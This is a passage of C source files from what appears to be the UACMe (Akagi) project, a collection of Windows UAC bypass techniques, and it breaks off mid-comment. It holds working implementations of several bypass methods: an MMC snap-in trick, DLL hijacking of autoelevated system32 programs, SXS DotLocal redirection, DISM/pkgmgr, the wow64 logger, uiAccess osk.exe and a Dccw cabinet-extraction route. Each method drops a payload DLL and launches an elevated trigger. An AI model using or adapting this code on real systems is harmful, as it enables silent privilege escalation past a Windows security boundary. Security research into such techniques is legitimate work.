    HRESULT(STDMETHODCALLTYPE* Initialize)(
        __RPC__in IWscAdmin* This);

    HRESULT(STDMETHODCALLTYPE* DoModalSecurityAction)(
        __RPC__in IWscAdmin* This,
        __RPC__in HWND ParentWindow,
        __RPC__in UINT Action,
        _Reserved_ PVOID Reserved);

    END_INTERFACE

} *PIWscAdminVtbl;

typedef struct IElevatedFactoryServerVtbl {

    BEGIN_INTERFACE

    HRESULT(STDMETHODCALLTYPE* QueryInterface)(
        __RPC__in IElevatedFactoryServer* This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        __RPC__in IElevatedFactoryServer* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        __RPC__in IElevatedFactoryServer* This);

    HRESULT(STDMETHODCALLTYPE* ServerCreateElevatedObject)(
        __RPC__in IElevatedFactoryServer* This,
        __RPC__in REFCLSID rclsid,
        __RPC__in REFIID riid,
        _COM_Outptr_ void** ppvObject);

    //incomplete definition

    END_INTERFACE

} *PIElevatedFactoryServerVtbl;

// INTERFACE DEF

interface IColorDataProxy { CONST_VTBL struct IColorDataProxyVtbl* lpVtbl; };
interface ICMLuaUtil { CONST_VTBL struct ICMLuaUtilVtbl* lpVtbl; };
interface IFwCplLua { CONST_VTBL struct IFwCplLuaInterfaceVtbl* lpVtbl; };
interface IEditionUpgradeManager { CONST_VTBL struct IEditionUpgradeManagerVtbl* lpVtbl; };
interface ISecurityEditor { CONST_VTBL struct ISecurityEditorVtbl* lpVtbl; };
interface IIEAdminBrokerObject { CONST_VTBL struct IIEAdminBrokerObjectVtbl* lpVtbl; };
interface IActiveXInstallBroker { CONST_VTBL struct IActiveXInstallBrokerVtbl* lpVtbl; };
interface IWscAdmin { CONST_VTBL struct IWscAdminVtbl* lpVtbl; };
interface IElevatedFactoryServer { CONST_VTBL struct IElevatedFactoryServerVtbl* lpVtbl; };

================================================
FILE: Source/Akagi/methods/hakril.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2017 - 2025
*
*  TITLE:       HAKRIL.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
*  UAC bypass method from Clement Rouault aka hakril.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "encresource.h"

typedef ULONG_PTR(WINAPI* pfnAipFindLaunchAdminProcess)(
    LPWSTR lpApplicationName,
    LPWSTR lpParameters,
    DWORD UacRequestFlag,
    DWORD dwCreationFlags,
    LPWSTR lpCurrentDirectory,
    HWND hWnd,
    PVOID StartupInfo,
    PVOID ProcessInfo,
    ELEVATION_REASON* ElevationReason);

/*
* ucmHakrilMethod
*
* Purpose:
*
* Bypass UAC by abusing "feature" of appinfo command line parser.
* (all bugs are features/not a boundary of %something% by MS philosophy)
* Command line parser logic allows execution of custom snap-in console as if it
* were "trusted" by Microsoft, resulting in your code running inside MMC.exe on High IL.
*
* Trigger: custom console snap-in with shockwave flash object resulting in
* execution of remote script on local machine with High IL.
*
*/
NTSTATUS ucmHakrilMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    ULONG DataSize = 0, SnapinSize = 0;
    SIZE_T Dummy, MscBufferSize = 0, MscSize = 0, MscBytesIO = 0;
    PVOID SnapinResource = NULL, SnapinData = NULL, MscBufferPtr = NULL;
    PVOID ImageBaseAddress = g_hInstance;
    CHAR *pszMarker;
    WCHAR szBuffer[MAX_PATH * 2];
    WCHAR szParams[MAX_PATH * 3];
    CHAR szConvertedBuffer[MAX_PATH * 2];
    PROCESS_INFORMATION procInfo;

    do {

        //
        // Decrypt and decompress custom Kamikaze snap-in.
        //
        SnapinResource = supLdrQueryResourceData(
            KAMIKAZE_ID,
            ImageBaseAddress,
            &DataSize);

        if (SnapinResource) {
            SnapinData = g_ctx->DecompressRoutine(KAMIKAZE_ID, SnapinResource, DataSize, &SnapinSize);
            if (SnapinData == NULL)
                break;
        }
        else
            break;

        if (!supReplaceDllEntryPoint(
            ProxyDll,
            ProxyDllSize,
            FUBUKI_DEFAULT_ENTRYPOINT,
            TRUE))
        {
            break;
        }

        //
        // Write Fubuki to the %temp%
        //
        RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
        _strcpy(szBuffer, g_ctx->szTempDirectory);
        Dummy = _strlen(szBuffer);
        _strcat(szBuffer, OSK_EXE);
        if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))
            break;

        //
        // Build filename for launcher.
        //
        szBuffer[Dummy] = 0;
        _strcat(szBuffer, KAMIKAZE_LAUNCHER);

        MscBufferSize = ALIGN_UP_BY(SnapinSize + sizeof(szBuffer), PAGE_SIZE);
        MscBufferPtr = supVirtualAlloc(
            &MscBufferSize,
            DEFAULT_ALLOCATION_TYPE,
            DEFAULT_PROTECT_TYPE,
            NULL);

        if (MscBufferPtr == NULL)
            break;

        //
        // Converted filename to ANSI to be used in msc modification next.
        //
        RtlSecureZeroMemory(szConvertedBuffer, sizeof(szConvertedBuffer));
        WideCharToMultiByte(CP_ACP, 0, szBuffer, -1, szConvertedBuffer, sizeof(szConvertedBuffer), NULL, NULL);

        //
        // Write launcher to the %temp%
        //
        if (!supDecodeAndWriteBufferToFile(szBuffer,
            (CONST PVOID)g_encodedKamikazeFinal,
            sizeof(g_encodedKamikazeFinal),
            'kmkz'))
        {
            break;
        }

        //
        // Build Kamikaze filename.
        //
        szBuffer[Dummy] = 0;
        _strcat(szBuffer, KAMIKAZE_MSC);

        //
        // Reconfigure msc snapin and write it to the %temp%.
        //
        pszMarker = _strstri_a((CHAR*)SnapinData, (const CHAR*)KAMIKAZE_MARKER);
        if (pszMarker && pszMarker >= (CHAR*)SnapinData && pszMarker < ((CHAR*)SnapinData + SnapinSize)) {

            //
            // Copy first part of snapin (unchanged).
            //
            MscBytesIO = (ULONG)(pszMarker - (PCHAR)SnapinData);
            MscSize = MscBytesIO;
            RtlCopyMemory(MscBufferPtr, SnapinData, MscBytesIO);

            //
            // Copy modified part.
            //
            MscBytesIO = (ULONG)_strlen_a(szConvertedBuffer);
            RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), (PVOID)&szConvertedBuffer, MscBytesIO);
            MscSize += MscBytesIO;

            //
            // Copy all of the rest.
            //
            while (*pszMarker != 0 && *pszMarker != '<' && pszMarker < ((CHAR*)SnapinData + SnapinSize)) {
                pszMarker++;
            }

            if (pszMarker < ((CHAR*)SnapinData + SnapinSize)) {
                MscBytesIO = (ULONG)(((PCHAR)SnapinData + SnapinSize) - pszMarker);
                RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), pszMarker, MscBytesIO);
                MscSize += MscBytesIO;
            }

            //
            // Write result to the file.
            //
            if (!supWriteBufferToFile(szBuffer, MscBufferPtr, (ULONG)MscSize))
                break;

            supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);
            MscBufferPtr = NULL;
        }

        //
        // Prepare snap-in parameters.
        //
        _strcpy(szParams, TEXT("lzx32,wf.msc \""));
        _strcat(szParams, szBuffer);
        _strcat(szParams, TEXT("\""));

        _strcpy(szBuffer, g_ctx->szSystemDirectory);
        _strcat(szBuffer, MMC_EXE);

        //
        // Run trigger application.
        //
        RtlSecureZeroMemory(&procInfo, sizeof(procInfo));
        if (AicLaunchAdminProcess(szBuffer,
            szParams,
            1, //elevate
            CREATE_UNICODE_ENVIRONMENT | CREATE_SUSPENDED,
            g_ctx->szSystemRoot,
            T_DEFAULT_DESKTOP,
            NULL,
            INFINITE,
            SW_HIDE,
            &procInfo))
        {
            if (procInfo.hThread) {
                ResumeThread(procInfo.hThread);
                CloseHandle(procInfo.hThread);
            }

            if (procInfo.hProcess) {
                if (WaitForSingleObject(procInfo.hProcess, 5000) == WAIT_TIMEOUT)
                    TerminateProcess(procInfo.hProcess, 0);
                CloseHandle(procInfo.hProcess);
            }

            MethodResult = STATUS_SUCCESS;
        }

    } while (FALSE);

    //
    // Cleanup.
    //
    if (MscBufferPtr) {
        supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);
    }

    if (SnapinData) {
        supSecureVirtualFree(SnapinData, SnapinSize, NULL);
    }

    return MethodResult;
}

/*
* ucmHakrilMethodCleanup
*
* Purpose:
*
* Post execution cleanup routine for HakrilMethod
*
*/
BOOL ucmHakrilMethodCleanup(
    VOID
)
{
    SIZE_T Dummy;
    WCHAR szBuffer[MAX_PATH * 2];

    _strcpy(szBuffer, g_ctx->szTempDirectory);
    Dummy = _strlen(szBuffer);
    _strcat(szBuffer, KAMIKAZE_MSC);
    DeleteFile(szBuffer);

    Sleep(1000);

    szBuffer[Dummy] = 0;
    _strcat(szBuffer, KAMIKAZE_LAUNCHER);
    DeleteFile(szBuffer);

    szBuffer[Dummy] = 0;
    _strcat(szBuffer, OSK_EXE);
    return DeleteFile(szBuffer);
}

================================================
FILE: Source/Akagi/methods/hybrids.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2025
*
*  TITLE:       HYBRIDS.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
*  Hybrid UAC bypass methods.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "makecab.h"
#include "encresource.h"

/*
* ucmMethodCleanupSingleItemSystem32
*
* Purpose:
*
* Post execution cleanup routine.
*
*/
BOOL ucmMethodCleanupSingleItemSystem32(
    _In_ LPCWSTR lpItemName,
    _In_opt_ LPCWSTR lpSubDirectory
)
{
    LPWSTR lpDestination;
    SIZE_T cb;
    BOOL bResult = FALSE;

    cb = 1 + sizeof(g_ctx->szSystemDirectory);
    cb += _strlen(lpItemName);
    if (lpSubDirectory)
        cb += _strlen(lpSubDirectory);
    cb *= sizeof(WCHAR);

    lpDestination = (LPWSTR)supHeapAlloc(cb);
    if (lpDestination) {
        _strcpy(lpDestination, g_ctx->szSystemDirectory);
        if (lpSubDirectory)
            _strcat(lpDestination, lpSubDirectory);
        _strcat(lpDestination, lpItemName);
        bResult = ucmMasqueradedDeleteDirectoryFileCOM(lpDestination);
        supHeapFree(lpDestination);
    }

    return bResult;
}

/*
* ucmGenericAutoelevationEx
*
* Purpose:
*
* Bypass UAC by abusing target autoelevated system32 application via missing system32 dll
*
*/
NTSTATUS ucmGenericAutoelevationEx(
    _In_opt_ LPCWSTR lpTargetApp,
    _In_ LPCWSTR lpTargetDll,
    _In_opt_ LPCWSTR lpParameters,
    _In_opt_ LPCWSTR lpSubDirectory,
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    SIZE_T cb, nLen;
    LPWSTR lpSource, lpDestination;

    //
    // Allocate source path.
    //
    cb = (MAX_PATH * 2) + sizeof(g_ctx->szTempDirectory) + (_strlen(lpTargetDll) * sizeof(WCHAR));
    lpSource = (LPWSTR)supHeapAlloc(cb + sizeof(UNICODE_NULL));
    if (lpSource == NULL)
        return STATUS_MEMORY_NOT_ALLOCATED;

    //
    // Allocate destination path.
    //
    cb = sizeof(g_ctx->szSystemDirectory);
    if (lpSubDirectory)
        cb += (_strlen(lpSubDirectory) * sizeof(WCHAR));
    cb += (_strlen(lpTargetDll) * sizeof(WCHAR));

    lpDestination = (LPWSTR)supHeapAlloc(cb + sizeof(UNICODE_NULL));
    if (lpDestination == NULL) {
        supHeapFree(lpSource);
        return STATUS_MEMORY_NOT_ALLOCATED;
    }

    //put target dll
    _strcpy(lpSource, g_ctx->szTempDirectory);
    _strcat(lpSource, lpTargetDll);
    nLen = _strlen(lpSource);
    lpSource[nLen - 1] = UCM_TRASH_END_CHAR;

    //write proxy dll to disk
    if (supWriteBufferToFile(lpSource, ProxyDll, ProxyDllSize)) {

        //target dir
        _strcpy(lpDestination, g_ctx->szSystemDirectory);
        if (lpSubDirectory)
            _strcat(lpDestination, lpSubDirectory);

        //drop payload to system32
        if (ucmMasqueradedMoveFileCOM(lpSource, lpDestination)) {

            _strcpy(lpSource, lpDestination);
            _strcat(lpSource, lpTargetDll);
            nLen = _strlen(lpSource);
            lpSource[nLen - 1] = UCM_TRASH_END_CHAR;

            if (ucmMasqueradedRenameElementCOM(lpSource, lpTargetDll)) {

                //run target app
                if (lpTargetApp) {
                    if (supRunProcess2(lpTargetApp, lpParameters, NULL, SW_HIDE, SUPRUNPROCESS_TIMEOUT_DEFAULT)) {
                        Sleep(5000);
                        MethodResult = STATUS_SUCCESS;
                    }
                }
                else {
                    MethodResult = STATUS_SUCCESS;
                }
            }
        }
    }

    supHeapFree(lpSource);
    supHeapFree(lpDestination);

    return MethodResult;
}

/*
* ucmGenericAutoelevation
*
* Purpose:
*
* Bypass UAC by abusing target autoelevated system32 application via missing system32 dll
*
*/
NTSTATUS ucmGenericAutoelevation(
    _In_opt_ LPCWSTR lpTargetApp,
    _In_ LPCWSTR lpTargetDll,
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    return ucmGenericAutoelevationEx(lpTargetApp, lpTargetDll, NULL, NULL, ProxyDll, ProxyDllSize);
}

/*
* ucmSXSMethod
*
* Purpose:
*
* Exploit SXS Local Redirect feature.
*
* SXS/Fusion uses dll redirection, attempting to load internal manifest dependencies from
* non existent directory (this is so called DotLocal dll redirection), it is trying to do this
* before going to WinSXS store.
*
* In this case dependency is Microsoft.Windows.Common-Controls.
*
* Maybe you think it is handy cool feature, but I think it's another backdoor from lazy dotnet crew.
* "You keep shipping crap, and crap, and more crap".
*
*/
NTSTATUS ucmSXSMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize,
    _In_opt_ LPWSTR lpTargetDirectory, //single element in system32 with slash at end
    _In_ LPWSTR lpTargetApplication, //executable name
    _In_opt_ LPWSTR lpLaunchApplication, //executable name, must be in same dir as lpTargetApplication
    _In_ BOOL bConsentItself
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    WCHAR* lpszFullDllPath = NULL, * lpszDirectoryName = NULL;
    SIZE_T sz;
    LPWSTR lpSxsPath = NULL;
    WCHAR szSrc[MAX_PATH * 2], szDst[MAX_PATH * 2];
    WCHAR szCurDir[MAX_PATH * 2];
    SXS_SEARCH_CONTEXT sctx;

    //
    // lpTargetApplication is the 4th parameter, report it as such.
    //
    if (lpTargetApplication == NULL)
        return STATUS_INVALID_PARAMETER_4;

    if (_strlen(lpTargetApplication) > MAX_PATH)
        return STATUS_INVALID_PARAMETER_4;

    do {

        //
        // Patch Fubuki to the new entry point
        //
        if (!supReplaceDllEntryPoint(ProxyDll, ProxyDllSize, FUBUKI_ENTRYPOINT_SXS, FALSE)) {
            break;
        }

        //common part, locate sxs dll, drop payload to temp
        RtlSecureZeroMemory(szSrc, sizeof(szSrc));
        RtlSecureZeroMemory(szDst, sizeof(szDst));

        sz = UNICODE_STRING_MAX_BYTES;
        lpszFullDllPath = (WCHAR*)supVirtualAlloc(
            &sz,
            DEFAULT_ALLOCATION_TYPE,
            DEFAULT_PROTECT_TYPE,
            NULL);

        if (lpszFullDllPath == NULL)
            break;

        sctx.DllName = COMCTL32_DLL;
        sctx.SxsKey = COMCTL32_SXS;
        sctx.FullDllPath = lpszFullDllPath;

        if (!sxsFindLoaderEntry(&sctx))
            break;

        lpszDirectoryName = _filename(lpszFullDllPath);
        if (lpszDirectoryName == NULL)
            break;

        sz = PAGE_SIZE + (_strlen(lpszDirectoryName) * sizeof(WCHAR));
        lpSxsPath = (LPWSTR)supVirtualAlloc(
            &sz,
            DEFAULT_ALLOCATION_TYPE,
            DEFAULT_PROTECT_TYPE,
            NULL);

        if (lpSxsPath == NULL)
            break;

        _strcpy(lpSxsPath, g_ctx->szSystemDirectory);
        if (lpTargetDirectory) {
            _strcat(lpSxsPath, lpTargetDirectory);
        }

        _strcpy(szDst, lpTargetApplication);

        //
        // Workaround for consent, so it won't ban itself.
        // Create all files and target directories with fake root name.
        // Next when all fileop is done, rename fake root to real.
        //
        if (bConsentItself) {
            _strcat(szDst, FAKE_LOCAL_SXS);
        }
        else {
            _strcat(szDst, LOCAL_SXS);
        }

        //create local directory
        if (!ucmMasqueradedCreateSubDirectoryCOM(lpSxsPath, szDst))
            break;

        //create assembly directory
        _strcat(lpSxsPath, szDst);
        if (!ucmMasqueradedCreateSubDirectoryCOM(lpSxsPath, lpszDirectoryName))
            break;

        _strcat(lpSxsPath, TEXT("\\"));
        _strcat(lpSxsPath, lpszDirectoryName);

        if (!ucmMasqueradedSetObjectSecurityCOM(lpSxsPath,
            DACL_SECURITY_INFORMATION,
            SE_FILE_OBJECT,
            T_SDDL_ALL_FOR_EVERYONE))
        {
            break;
        }

        //move payload file
        GetCurrentDirectory(MAX_PATH * 2, szCurDir);
        SetCurrentDirectory(lpSxsPath);
        if (!supWriteBufferToFile(COMCTL32_DLL, ProxyDll, ProxyDllSize)) {
            //restore caller's current directory before bailing out
            SetCurrentDirectory(szCurDir);
            break;
        }
        SetCurrentDirectory(szCurDir);

        //
        // Consent workaround end.
        // Restore real directory name.
        //
        if (bConsentItself) {
            _strcpy(lpSxsPath, g_ctx->szSystemDirectory);
            if (lpTargetDirectory) {
                _strcat(lpSxsPath, lpTargetDirectory);
            }
            _strcat(lpSxsPath, lpTargetApplication);
            _strcat(lpSxsPath, FAKE_LOCAL_SXS);

            _strcpy(szDst, lpTargetApplication);
            _strcat(szDst, LOCAL_SXS);

            if (!ucmMasqueradedRenameElementCOM(lpSxsPath, szDst))
                break;
        }

        //run target process
        _strcpy(szDst, g_ctx->szSystemDirectory);
        if (lpTargetDirectory) {
            _strcat(szDst, lpTargetDirectory);
        }
        if (lpLaunchApplication) {
            _strcat(szDst, lpLaunchApplication);
        }
        else {
            _strcat(szDst, lpTargetApplication);
        }

        if (supRunProcess2(szDst, NULL, NULL, SW_SHOWNORMAL, 1000)) {
            MethodResult = STATUS_SUCCESS;
        }

    } while (FALSE);

    if (lpszFullDllPath)
        supVirtualFree(lpszFullDllPath, NULL);

    if (lpSxsPath)
        supVirtualFree(lpSxsPath, NULL);

    return MethodResult;
}

/*
* ucmSXSMethodCleanup
*
* Purpose:
*
* Post execution cleanup routine for SXSMethod.
*
*/
BOOL ucmSXSMethodCleanup(
    VOID
)
{
    WCHAR szBuffer[MAX_PATH * 2];

    _strcpy(szBuffer, g_ctx->szSystemDirectory);
    _strcat(szBuffer, CONSENT_EXE);
    _strcat(szBuffer, LOCAL_SXS);
    return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);
}

/*
* ucmxDisemer
*
* Purpose:
*
* Build parameters to the pkgmgr and force it to start dism.exe.
*
* Note:
* Name is a very original WD behavior signature name.
*
*/
NTSTATUS ucmxDisemer(
    VOID
)
{
    WCHAR szApplication[MAX_PATH * 2];
    WCHAR szParameters[256];

    _strcpy(szApplication, g_ctx->szSystemDirectory);
    _strcat(szApplication, PKGMGR_EXE);

    _strcpy(szParameters, TEXT("/ip"));
    _strcat(szParameters, TEXT(" /m:"));
    _strcat(szParameters, MYSTERIOUSCUTETHING);
    _strcat(szParameters, TEXT(" /quiet"));

    if (supRunProcess2(szApplication, szParameters, NULL, SW_HIDE, SUPRUNPROCESS_TIMEOUT_DEFAULT)) {
        return STATUS_SUCCESS;
    }

    return STATUS_ACCESS_DENIED;
}

#define DISM_DLL_NAMES 2
LPCWSTR g_DismTargets[DISM_DLL_NAMES] = {
    DISMCORE_DLL,
    APISET_KERNEL32LEGACY
};

/*
* ucmDismMethodCleanup
*
* Purpose:
*
* Cleanup routine for Dism method.
*
*/
VOID ucmDismMethodCleanup(VOID)
{
    DWORD i, cNames;

    cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 1 : DISM_DLL_NAMES;

    for (i = 0; i < cNames; i++) {
        ucmMethodCleanupSingleItemSystem32(g_DismTargets[i], NULL);
    }
}

/*
* ucmDismMethod
*
* Purpose:
*
* Exploit DISM application dll loading scheme.
*
* Dism.exe is located in the system32 folder while its dlls are in system32\dism.
* When loaded, dism first attempts to load dlls from the system32 folder.
*
* Trigger: pkgmgr.exe
* PkgMgr.exe is autoelevated whitelisted application which is actually just calling Dism.exe
*
*/
NTSTATUS ucmDismMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    DWORD i, cNames;
    SIZE_T nLen;
    WCHAR szSource[MAX_PATH * 2];

    cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ?
        1 : DISM_DLL_NAMES;

    for (i = 0; i < cNames; i++) {

        MethodResult = ucmGenericAutoelevation(NULL, g_DismTargets[i], ProxyDll, ProxyDllSize);
        if (NT_SUCCESS(MethodResult)) {
            MethodResult = ucmxDisemer();
        }

        //
        // Cleanup temp.
        //
        if (!NT_SUCCESS(MethodResult)) {
            _strcpy(szSource, g_ctx->szTempDirectory);
            _strcat(szSource, g_DismTargets[i]);
            nLen = _strlen(szSource);
            szSource[nLen - 1] = UCM_TRASH_END_CHAR;
            DeleteFile(szSource);
        }

        Sleep(1000);
    }

    return MethodResult;
}

/*
* ucmWow64LoggerMethod
*
* Purpose:
*
* Bypass UAC using wow64 logger dll and wow64 application.
*
* Trigger: 32bit version of wusa.exe
* Loader will map and call our logger dll during wow64 process initialization.
*
*/
NTSTATUS ucmWow64LoggerMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    WCHAR szTarget[MAX_PATH * 2];

    //
    // Build target application full path.
    // We need autoelevated application from syswow64 folder ONLY.
    //
    _strcpy(szTarget, USER_SHARED_DATA->NtSystemRoot);
    _strcat(szTarget, SYSWOW64_DIR);
    _strcat(szTarget, WUSA_EXE);

    //
    // Attempt to remove payload dll after execution in method.c!PostCleanupAttempt.
    // Warning: every wow64 application will load payload code (some will crash).
    // Remove file IMMEDIATELY after work.
    //
    return ucmGenericAutoelevation(szTarget, WOW64LOG_DLL, ProxyDll, ProxyDllSize);
}

/*
* ucmUiAccessMethod
*
* Purpose:
*
* Bypass UAC using uiAccess(true) application.
* Original method source
* https://habrahabr.ru/company/pm/blog/328008/
*
*/
NTSTATUS ucmUiAccessMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    SIZE_T Length;
    LPWSTR lpEnv = NULL, lpTargetDll;
    UNICODE_STRING uStr = RTL_CONSTANT_STRING(L"ProgramFiles=");
    WCHAR szTarget[MAX_PATH * 2];
    WCHAR szSource[MAX_PATH * 2];

    do {

        //
        // There is no osksupport.dll in Windows 7.
        //
        if (g_ctx->dwBuildNumber < NT_WIN8_RTM)
            lpTargetDll = DUSER_DLL;
        else
            lpTargetDll = OSKSUPPORT_DLL;

        //
        // Replace default Fubuki dll entry point with new.
        //
        if (!supReplaceDllEntryPoint(ProxyDll, ProxyDllSize, FUBUKI_EXT_ENTRYPOINT, FALSE)) {
            break;
        }

        //
        // Drop modified Fubuki to the %temp%
        //
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        _strcpy(szSource, g_ctx->szTempDirectory);
        _strcat(szSource, lpTargetDll);
        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize))
            break;

        //
        // Build target path in g_lpIncludePFDirs
        //
        lpEnv = supQueryEnvironmentVariableOffset(&uStr);
        if (lpEnv == NULL)
            break;

        Length = _strlen(lpEnv);
        if ((Length == 0) || (Length > MAX_PATH))
            break;

        RtlSecureZeroMemory(&szTarget, sizeof(szTarget));
        _strncpy(szTarget, MAX_PATH, lpEnv, MAX_PATH);
        _strcat(szTarget, TEXT("\\"));
        _strcat(szTarget, T_WINDOWSMEDIAPLAYER);
        _strcat(szTarget, TEXT("\\"));

        //
        // In case if Media Player is not installed / available.
        //
        if (!PathFileExists(szTarget)) {
            if (!ucmMasqueradedCreateSubDirectoryCOM(lpEnv, T_WINDOWSMEDIAPLAYER))
                break;
        }

        //
        // Copy Fubuki to target directory.
        //
        if (!ucmMasqueradedMoveFileCOM(szSource, szTarget))
            break;

        //
        // Copy osk.exe to Program Files\Windows Media Player
        //
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        _strcpy(szSource, g_ctx->szSystemDirectory);
        _strcat(szSource, OSK_EXE);
        if (!ucmMasqueradedMoveCopyFileCOM(szSource, szTarget, FALSE))
            break;

        //
        // Run uiAccess osk.exe from Program Files.
        //
        _strcat(szTarget, OSK_EXE);
        if (supRunProcess2(szTarget, NULL, NULL, SW_SHOW, 0)) {

            //
            // Run eventvwr.exe as final trigger.
            // Spawns mmc.exe with eventvwr.msc snap-in.
            //
            _strcpy(szTarget, g_ctx->szSystemDirectory);
            _strcat(szTarget, EVENTVWR_EXE);
            if (supRunProcess2(szTarget, NULL, NULL, SW_SHOW, 0))
                MethodResult = STATUS_SUCCESS;
        }

    } while (FALSE);

    return MethodResult;
}

/*
* ucmSXSDccwMethod
*
* Purpose:
*
* Similar to ucmSXSMethod, except using different target app and dll.
* Dccw idea by Ernesto Fernandez (https://github.com/L3cr0f/DccwBypassUAC)
*
*/
NTSTATUS ucmSXSDccwMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    BOOL bWusaNeedCleanup = FALSE;
    HMODULE hGdiPlus = NULL;
    WCHAR* lpszFullDllPath = NULL, * lpszDirectoryName = NULL;
    SIZE_T sz;
    LPWSTR lpSxsPath = NULL, lpEnd;
    WCHAR szBuffer[MAX_PATH * 2], szTarget[MAX_PATH * 2];
    SXS_SEARCH_CONTEXT sctx;

    do {

        //
        // Check if target app available. Maybe unavailable in server edition.
        //
        _strcpy(szTarget, g_ctx->szSystemDirectory);
        _strcat(szTarget, DCCW_EXE);
        if (!PathFileExists(szTarget)) {
            MethodResult = STATUS_OBJECT_NAME_NOT_FOUND;
            break;
        }

        //
        // Load GdiPlus in our address space to get its full path.
        //
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy(szBuffer, g_ctx->szSystemDirectory);
        _strcat(szBuffer, GDIPLUS_DLL);
        hGdiPlus = LoadLibrary(szBuffer);
        if (hGdiPlus == NULL) {
            MethodResult = STATUS_DLL_NOT_FOUND;
            break;
        }

        sz = UNICODE_STRING_MAX_BYTES;
        lpszFullDllPath = (WCHAR*)supVirtualAlloc(
            &sz,
            DEFAULT_ALLOCATION_TYPE,
            DEFAULT_PROTECT_TYPE,
            NULL);

        if (lpszFullDllPath == NULL)
            break;

        sctx.DllName = GDIPLUS_DLL;
        sctx.SxsKey = GDIPLUS_SXS;
        sctx.FullDllPath = lpszFullDllPath;

        if (!sxsFindLoaderEntry(&sctx)) {
            MethodResult = STATUS_SXS_KEY_NOT_FOUND;
            break;
        }

        lpszDirectoryName = _filename(lpszFullDllPath);
        if (lpszDirectoryName == NULL)
            break;

        sz = _strlen(lpszDirectoryName) * sizeof(WCHAR);
        sz += PAGE_SIZE;
        lpSxsPath = (LPWSTR)supVirtualAlloc(
            &sz,
            DEFAULT_ALLOCATION_TYPE,
            DEFAULT_PROTECT_TYPE,
            NULL);

        if (lpSxsPath == NULL)
            break;

        //
        // Create DotLocal path.
        //
        _strcpy(lpSxsPath, DCCW_EXE);
        _strcat(lpSxsPath, LOCAL_SXS);
        _strcat(lpSxsPath, TEXT("\\"));
        _strcat(lpSxsPath, lpszDirectoryName);
        _strcat(lpSxsPath, TEXT("\\"));
        _strcat(lpSxsPath, GDIPLUS_DLL);

        //
        // Create fake cab file.
        //
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy(szBuffer, g_ctx->szTempDirectory);
        _strcat(szBuffer, GDIPLUS_DLL);

        bWusaNeedCleanup = ucmCreateCabinetForSingleFile(
            szBuffer,
            ProxyDll,
            ProxyDllSize,
            lpSxsPath);

        if (!bWusaNeedCleanup)
            break;

        _strcpy(szBuffer, g_ctx->szSystemDirectory);
        lpEnd = _strend(szBuffer);
        if (*(lpEnd - 1) == TEXT('\\'))
            *(lpEnd - 1) = TEXT('\0');

        if (!ucmWusaExtractViaJunction(szBuffer))
            break;

        Sleep(2000);

        //
        // Run target.
        //
        if (supRunProcess(szTarget, NULL))
            MethodResult = STATUS_SUCCESS;

    } while (FALSE);

    //
    // Cleanup resources.
    //
    if (hGdiPlus != NULL)
        FreeLibrary(hGdiPlus);

    if (lpszFullDllPath)
        supVirtualFree(lpszFullDllPath, NULL);

    if (lpSxsPath)
        supVirtualFree(lpSxsPath, NULL);

    if (bWusaNeedCleanup)
        ucmWusaCabinetCleanup();

    return MethodResult;
}

/*
* ucmSXSDccwMethodCleanup
*
* Purpose:
*
* Post execution cleanup routine for SXSDccwMethod.
*
*/
BOOL ucmSXSDccwMethodCleanup(
    VOID
)
{
    WCHAR szBuffer[MAX_PATH * 2];

    _strcpy(szBuffer, g_ctx->szSystemDirectory);
    _strcat(szBuffer, DCCW_EXE);
    _strcat(szBuffer, LOCAL_SXS);
    return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);
}

/*
* ucmCorProfilerMethod
*
* Purpose:
*
* Bypass UAC using COR profiler.
